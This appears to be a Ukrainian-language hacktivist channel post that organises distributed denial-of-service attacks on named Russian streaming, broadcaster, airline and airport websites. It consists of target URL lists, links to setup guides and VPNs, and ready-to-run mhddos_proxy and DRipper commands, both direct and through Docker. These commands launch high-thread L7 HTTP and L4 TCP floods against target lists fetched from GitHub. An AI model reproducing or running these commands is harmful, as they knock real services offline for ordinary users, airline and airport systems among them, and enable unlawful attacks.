title
python3 runner.py https://okko.tv https://mimimi.okko.team/ https://pobeda.okko.tv https://www.ontvtime.ru https://www.amediateka.ru https://kodiki.amediateka.ru/ https://rt.amediateka.ru/ https://akado.amediateka.ru/ https://wink.ru https://www.1tv.ru/live https://cm.1tv.ru/ https://tlxmob.1tv.ru/ https://25.1tv.ru/ https://kino.1tv.ru/ https://users.1tv.ru/ http://edu.1tv.ru/ https://admin.kino.1tv.ru/ https://stage.1tv.ru/ https://subscr.1tv.ru/ https://kino-teatr.ru http://m.kino-teatr.ru/ https://mt.kino-teatr.ru/ --http-methods GET STRESS -t 10000 --rpc 2000 -p 600 --debug
віа-перевезення РФ🔥
https://www.aviasales.ru/
https://nordwindairlines.ru/ru
https://www.aeroflot.ru/ru-ru
https://azimuth.aero/ru
https://www.uralairlines.ru/
https://kiyaviakrym.com/
https://rov.aero/
https://airport-murmansk.ru/
❗️Гайди як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️ (https://auto-ddos.notion.site/auto-ddos/DDoS-new-b6f56bf8e4cd4eebb5abfc85cbd77f93)Рекомендую усім перейти на новий супер-швидкий та стабільний VPN
(https://auto-ddos.notion.site/VPN-effde85923534cf7b4caa198a0ef0d23)❗️Як перевести будь-який процес у відновлюваний фон на Linux (пункт 4): https://telegra.ph/Analіz-zasobu-mhddos-proxy-04-01
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + Розвідка цілей) тепер зібрано тут
❗️ (https://auto-ddos.notion.site/auto-ddos/DDoS-new-b6f56bf8e4cd4eebb5abfc85cbd77f93)Ці цілі також додані у наші автоматизовані скрипти
(https://t.me/ddos_separ/1126)❗️ (https://auto-ddos.notion.site/auto-ddos/DDoS-new-b6f56bf8e4cd4eebb5abfc85cbd77f93)Вийшла нова покращена версія mhddos_proxy, рекомендую оновити (обирайте інструкцію для вашої ОС та гортайте до пункту Запуск команд / атаки): https://t.me/ddos_separ/990
(для Linux-серверів (https://auto-ddos.notion.site/dd91326ed30140208383ffedd0f13e5c) та авто-скриптів (https://t.me/ddos_separ/1126) нічого не потрібно змінювати - воно оновлюється повністю самостійно)
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_url -t 5000 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_http -t 5000 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l4_tcp -t 5000 --rpc 2000 --debug
✅Docker Windows / Для Linux додайте sudo:
🔹ПРІОРИТЕТ атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_url -t 5000 --rpc 2000 --http-methods GET POST --debug
🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_http -t 5000 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l4_tcp -t 5000 --rpc 2000 --debug
🟢DRipper (https://github.com/alexmon1989/russia_ddos) (вийшла нова версія (https://github.com/alexmon1989/russia_ddos/blob/main/docs/SetupGuide.md), яка підтримує багато цілей в одній атаці і ще багато чого крутого):
🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_url
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l4_tcp
🟢Docker Windows / Для Linux додайте sudo:
🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_url
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l4_tcp